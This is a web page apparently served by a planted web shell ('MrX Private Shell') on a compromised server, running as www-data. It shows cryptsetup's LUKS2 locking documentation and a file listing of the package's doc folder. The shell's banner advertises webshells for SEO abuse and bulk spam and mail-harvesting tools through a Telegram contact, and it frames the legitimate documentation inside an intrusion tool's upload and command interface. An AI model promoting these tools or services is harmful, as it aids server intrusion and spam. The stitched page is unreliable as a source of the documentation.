__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
LUKS2 device locking overview
=============================

Why
~~~

LUKS2 format keeps two identical copies of metadata stored consecutively
at the head of the metadata device (file or bdev). The metadata
area (both copies) must be updated in a single atomic operation to avoid
header corruption during concurrent write.

While with LUKS1 users may have clear knowledge of when a LUKS header is
being updated (written to) or when it's being read solely the need for
locking with legacy format was not so obvious as it is with the LUKSv2 format.

With LUKS2 the boundary between read-only and read-write is blurry and what
used to be the exclusively read-only operation (i.e., cryptsetup open command) may
easily become read-update operation silently without the user's knowledge.
A major feature of the LUKS2 format is resilience against accidental
corruption of metadata (i.e., partial header overwrite by parted or cfdisk
while creating a partition on a mistaken block device).
Such header corruption is detected early on the header read and the auto-recovery
procedure takes place (the corrupted header with checksum mismatch is being
replaced by the secondary one if that one is intact).
On current Linux systems header load operation may be triggered without the user
direct intervention for example by an udev rule or from a systemd service.
Such a clash of header read and auto-recovery procedure could have severe
consequences with the worst case of having a LUKS2 device inaccessible or being
broken beyond repair.

The whole locking of LUKSv2 device headers split into two categories depending
what backend the header is stored on:

I) block device
~~~~~~~~~~~~~~~

We perform flock() on file descriptors of files stored in a private
directory (by default /run/lock/cryptsetup). The file name is derived
from major:minor couple of the affected block device. Note we recommend
that access to the private locking directory is supposed to be limited
to the superuser only. For this method to work the distribution needs
to install the locking directory with appropriate access rights.

II) regular files
~~~~~~~~~~~~~~~~~

A first notable difference between headers stored in a file
vs. headers stored in a block device is that headers in a file may be
manipulated by the regular user, unlike headers on block devices. Therefore
we perform flock() protection on file with the luks2 header directly.

Limitations
~~~~~~~~~~~

a) In general, the locking model provides serialization of I/Os targeting
the header only. It means the header is always written or read at once
while locking is enabled.
We do not suppress any other negative effect that two or more concurrent
writers of the same header may cause.

b) The locking is not cluster-aware in any way.

Additional LUKS2 locks
======================

LUKS2 reencryption device lock
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Device in LUKS2 reencryption is protected by an exclusive lock placed in the default
locking directory. The lock's purpose is to exclude multiple processes from
performing reencryption on the same device (identified by LUKS uuid). The lock
is taken no matter the LUKS2 reencryption mode (online or offline).

LUKS2 memory hard global lock
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

An optional global lock that makes libcryptsetup serialize memory hard
pbkdf function when deriving a key encryption key from passphrase on unlocking
LUKS2 keyslot. The lock has to be enabled via the CRYPT_ACTIVATE_SERIALIZE_MEMORY_HARD_PBKDF
flag. The lock is placed in the default locking directory.

LUKS2 OPAL lock
~~~~~~~~~~~~~~~

Exclusive per device lock taken when manipulating LUKS2 device configured for use with
SED OPAL2 locking range.

Lock ordering
=============

To avoid a deadlock following rules must apply:

- LUKS2 reencrytpion lock must be taken before LUKS2 OPAL lock.

- LUKS2 OPAL lock must be taken before LUKS2 metadata lock.

- LUKS2 memory hard global lock can not be used with other locks.

Filemanager

Name Type Size Permission Actions
examples Folder 0755
AUTHORS File 137 B 0644
FAQ.md.gz File 49.58 KB 0644
Keyring.txt File 3.81 KB 0644
LUKS2-locking.txt File 3.87 KB 0644
NEWS.Debian.gz File 660 B 0644
README.Debian.gz File 5.61 KB 0644
README.debug File 2.67 KB 0644
README.gnupg File 1.8 KB 0644
README.gnupg-sc File 2.3 KB 0644
README.keyctl File 3.5 KB 0644
README.md.gz File 2.45 KB 0644
README.opensc.gz File 2.17 KB 0644
changelog.Debian.gz File 16.67 KB 0644
copyright File 11.11 KB 0644
v1.0.7-ReleaseNotes File 2.85 KB 0644
v1.1.0-ReleaseNotes.gz File 2.22 KB 0644
v1.1.1-ReleaseNotes File 1.75 KB 0644
v1.1.2-ReleaseNotes File 1.56 KB 0644
v1.1.3-ReleaseNotes File 482 B 0644
v1.2.0-ReleaseNotes.gz File 2.08 KB 0644
v1.3.0-ReleaseNotes.gz File 2.08 KB 0644
v1.3.1-ReleaseNotes File 421 B 0644
v1.4.0-ReleaseNotes.gz File 2.2 KB 0644
v1.4.1-ReleaseNotes File 889 B 0644
v1.4.2-ReleaseNotes File 1.6 KB 0644
v1.4.3-ReleaseNotes File 2.31 KB 0644
v1.5.0-ReleaseNotes.gz File 3.24 KB 0644
v1.5.1-ReleaseNotes File 1.26 KB 0644
v1.6.0-ReleaseNotes.gz File 3.73 KB 0644
v1.6.1-ReleaseNotes File 1.02 KB 0644
v1.6.2-ReleaseNotes File 989 B 0644
v1.6.3-ReleaseNotes File 1.82 KB 0644
v1.6.4-ReleaseNotes File 1.99 KB 0644
v1.6.5-ReleaseNotes File 2.42 KB 0644
v1.6.6-ReleaseNotes File 1.07 KB 0644
v1.6.7-ReleaseNotes File 3.26 KB 0644
v1.6.8-ReleaseNotes File 2.02 KB 0644
v1.7.0-ReleaseNotes File 3.03 KB 0644
v1.7.1-ReleaseNotes File 1.34 KB 0644
v1.7.2-ReleaseNotes File 1.45 KB 0644
v1.7.3-ReleaseNotes File 811 B 0644
v1.7.4-ReleaseNotes File 661 B 0644
v1.7.5-ReleaseNotes File 833 B 0644
v2.0.0-ReleaseNotes.gz File 9.5 KB 0644
v2.0.1-ReleaseNotes.gz File 2.17 KB 0644
v2.0.2-ReleaseNotes.gz File 1.95 KB 0644
v2.0.3-ReleaseNotes.gz File 2.39 KB 0644
v2.0.4-ReleaseNotes.gz File 2.27 KB 0644
v2.0.5-ReleaseNotes.gz File 2.02 KB 0644
v2.0.6-ReleaseNotes.gz File 1.91 KB 0644
v2.1.0-ReleaseNotes.gz File 3.41 KB 0644
v2.2.0-ReleaseNotes.gz File 4.47 KB 0644
v2.2.1-ReleaseNotes File 1.38 KB 0644
v2.2.2-ReleaseNotes File 2.1 KB 0644
v2.3.0-ReleaseNotes.gz File 3.18 KB 0644
v2.3.1-ReleaseNotes File 1.73 KB 0644
v2.3.2-ReleaseNotes File 1.47 KB 0644
v2.3.3-ReleaseNotes File 1.36 KB 0644
v2.3.4-ReleaseNotes.gz File 1.95 KB 0644
v2.3.5-ReleaseNotes.gz File 3.06 KB 0644
v2.3.6-ReleaseNotes File 2.26 KB 0644
v2.4.0-ReleaseNotes.gz File 4.65 KB 0644
v2.4.1-ReleaseNotes File 1.9 KB 0644
v2.4.2-ReleaseNotes File 1.34 KB 0644
v2.4.3-ReleaseNotes.gz File 1.95 KB 0644
v2.5.0-ReleaseNotes.gz File 4.35 KB 0644
v2.6.0-ReleaseNotes.gz File 3.62 KB 0644
v2.6.1-ReleaseNotes File 2.06 KB 0644
v2.7.0-ReleaseNotes.gz File 6.5 KB 0644
Filemanager